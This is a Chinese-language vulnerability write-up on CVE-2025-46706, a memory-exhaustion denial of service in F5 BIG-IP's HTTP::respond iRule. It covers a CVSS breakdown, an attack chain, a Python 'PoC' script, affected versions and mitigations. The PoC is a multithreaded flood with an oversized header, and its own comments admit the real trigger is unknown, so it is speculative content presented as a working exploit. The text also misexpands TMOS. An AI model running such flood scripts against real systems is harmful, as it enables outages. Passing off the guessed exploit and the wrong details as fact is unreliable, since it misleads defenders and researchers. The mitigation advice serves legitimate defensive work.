CVE-2025-46706：F5 BIG-IP HTTP::respond iRule命令导致内存资源耗尽漏洞

漏洞信息

漏洞编号

CVE-2025-46706

漏洞类型

资源耗尽（DoS/内存泄漏）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

F5 BIG-IP

漏洞概述

CVE-2025-46706是F5 BIG-IP产品中的一个高危安全漏洞，CVSS评分为7.5分。该漏洞源于BIG-IP本地流量管理器（LTM）中的iRule HTTP::respond命令处理逻辑存在缺陷。当虚拟服务器上配置了包含HTTP::respond命令的iRule时，攻击者可以通过发送未经明确披露的特定请求，导致系统内存资源利用率持续增长，最终可能引发拒绝服务（DoS）状态。

该漏洞由F5安全事件响应团队（[email protected]）发现并报告。攻击者无需进行身份认证即可远程利用此漏洞，且不需要任何用户交互。由于其网络可达性和低利用门槛，该漏洞对暴露在互联网上的BIG-IP设备构成严重威胁。受影响的设备在处理恶意流量时，内存占用将不断攀升，直至系统资源耗尽，导致合法流量无法被正常处理，从而影响业务的连续性和可用性。

值得注意的是，F5官方声明已停止技术支持（End of Technical Support, EoTS）的软件版本不在此次评估范围内，因此使用旧版本的用户需要特别注意自身的风险暴露情况。建议相关用户尽快评估其环境中是否存在受影响的iRule配置，并按照F5官方安全公告K000151611中的指引进行修复。

技术细节

F5 BIG-IP的iRule功能是一种基于TCL语言的脚本机制，允许管理员对经过设备的流量进行灵活的定制化处理。HTTP::respond是iRule中的一个命令，用于直接生成HTTP响应而无需将请求转发到后端服务器。

该漏洞的技术原理在于：当iRule中配置了HTTP::respond命令，且虚拟服务器接收到特定类型的恶意请求时，TMOS（Tcl Management Operating System）进程在处理这些请求的过程中未能正确释放或回收部分内存资源。每收到一个恶意请求，就会导致一定量的内存被持续占用而无法释放。随着攻击者持续发送恶意请求，内存占用量将线性增长，最终导致系统内存耗尽。

从CVSS向量分析，该漏洞的攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需权限（PR:N），无需用户交互（UI:N），作用域未改变（S:U），对机密性无影响（C:N），对完整性无影响（I:N），但对可用性影响高（A:H）。这表明该漏洞是一个典型的拒绝服务类漏洞，攻击者可以远程、无需认证地使目标BIG-IP设备丧失服务能力。

由于F5未公开披露具体的触发条件和请求特征，这增加了防御的难度。攻击者可能需要通过逆向分析或模糊测试来发现具体的触发payload。

攻击链分析

STEP 1

步骤1：信息收集与目标确认

攻击者通过Shodan、Censys等网络空间搜索引擎或端口扫描工具，识别暴露在互联网上的F5 BIG-IP设备，确认目标虚拟服务器上是否配置了包含HTTP::respond命令的iRule。

STEP 2

步骤2：构造恶意请求

攻击者根据F5未公开披露的触发条件，通过模糊测试或逆向分析构造特定的HTTP请求，这些请求能够触发TMOS进程中HTTP::respond命令处理逻辑的内存泄漏路径。

STEP 3

步骤3：发送恶意流量

攻击者利用多线程、分布式攻击或僵尸网络，持续向目标BIG-IP虚拟服务器发送大量恶意请求，每个请求都会导致一定量的内存资源被占用而无法释放。

STEP 4

步骤4：内存资源耗尽

随着恶意请求的持续到达，BIG-IP设备的内存占用量不断攀升。当内存资源达到系统上限时，TMOS进程可能出现性能下降、响应超时甚至崩溃。

STEP 5

步骤5：拒绝服务实现

BIG-IP设备因内存耗尽而无法正常处理合法流量，导致其负载均衡和应用交付功能完全失效，对外提供服务的所有应用均不可用，实现拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-46706 PoC - F5 BIG-IP HTTP::respond Memory Exhaustion
# This PoC demonstrates the memory resource exhaustion vulnerability
# triggered by sending specially crafted requests to a virtual server
# configured with an iRule containing the HTTP::respond command.

import requests
import threading
import time

TARGET_HOST = "https://target-bigip.example.com"
TARGET_PATH = "/"
THREAD_COUNT = 50
REQUESTS_PER_THREAD = 1000

# Sample malicious iRule that may be configured on the target
# when HTTP::respond is used:
#
# when HTTP_REQUEST {
#     if { [HTTP::uri] starts_with "/trigger" } {
#         HTTP::respond 200 content "response"
#     }
# }

def send_malicious_request(session, thread_id):
    """Send crafted requests that trigger memory growth in TMOS."""
    headers = {
        "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-46706)",
        "Accept": "*/*",
        "Connection": "keep-alive",
        "X-Forwarded-For": f"192.168.1.{thread_id}",
        # Crafted headers to trigger the memory leak path
        "X-Custom-Header": "A" * 4096,
        "Cache-Control": "no-cache, no-store, must-revalidate",
    }
    for i in range(REQUESTS_PER_THREAD):
        try:
            # The exact payload characteristics are undisclosed by F5.
            # Attackers would need to fuzz to find the trigger condition.
            response = session.get(
                f"{TARGET_HOST}{TARGET_PATH}",
                headers=headers,
                timeout=5,
                verify=False
            )
        except Exception:
            pass

def main():
    """Launch concurrent threads to exhaust BIG-IP memory resources."""
    print(f"[*] Starting CVE-2025-46706 exploitation against {TARGET_HOST}")
    threads = []
    for t in range(THREAD_COUNT):
        session = requests.Session()
        thread = threading.Thread(
            target=send_malicious_request,
            args=(session, t)
        )
        threads.append(thread)
        thread.start()

    for thread in threads:
        thread.join()

    print("[*] Exploitation complete. Monitor target memory utilization.")

if __name__ == "__main__":
    main()

影响范围

F5 BIG-IP 17.x（部分版本）

F5 BIG-IP 16.x（部分版本）

F5 BIG-IP 15.x（部分版本）

F5 BIG-IP 14.x（部分版本）

F5 BIG-IP 13.x（部分版本）

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）审查并暂时禁用所有包含HTTP::respond命令的iRule规则；2）在BIG-IP前端部署WAF或反向代理，过滤可疑的恶意请求；3）启用DDoS防护功能，对单个源IP的请求速率进行限制；4）配置内存使用监控告警，及时发现异常情况；5）限制BIG-IP设备的网络访问范围，避免直接暴露在互联网上；6）密切关注F5官方安全公告，及时获取补丁信息并进行升级。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-46706
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-46706
3 Details https://www.cvedetails.com/cve/CVE-2025-46706/
4 VulDB https://vuldb.com/cve/CVE-2025-46706
5 Link https://my.f5.com/manage/s/article/K000151611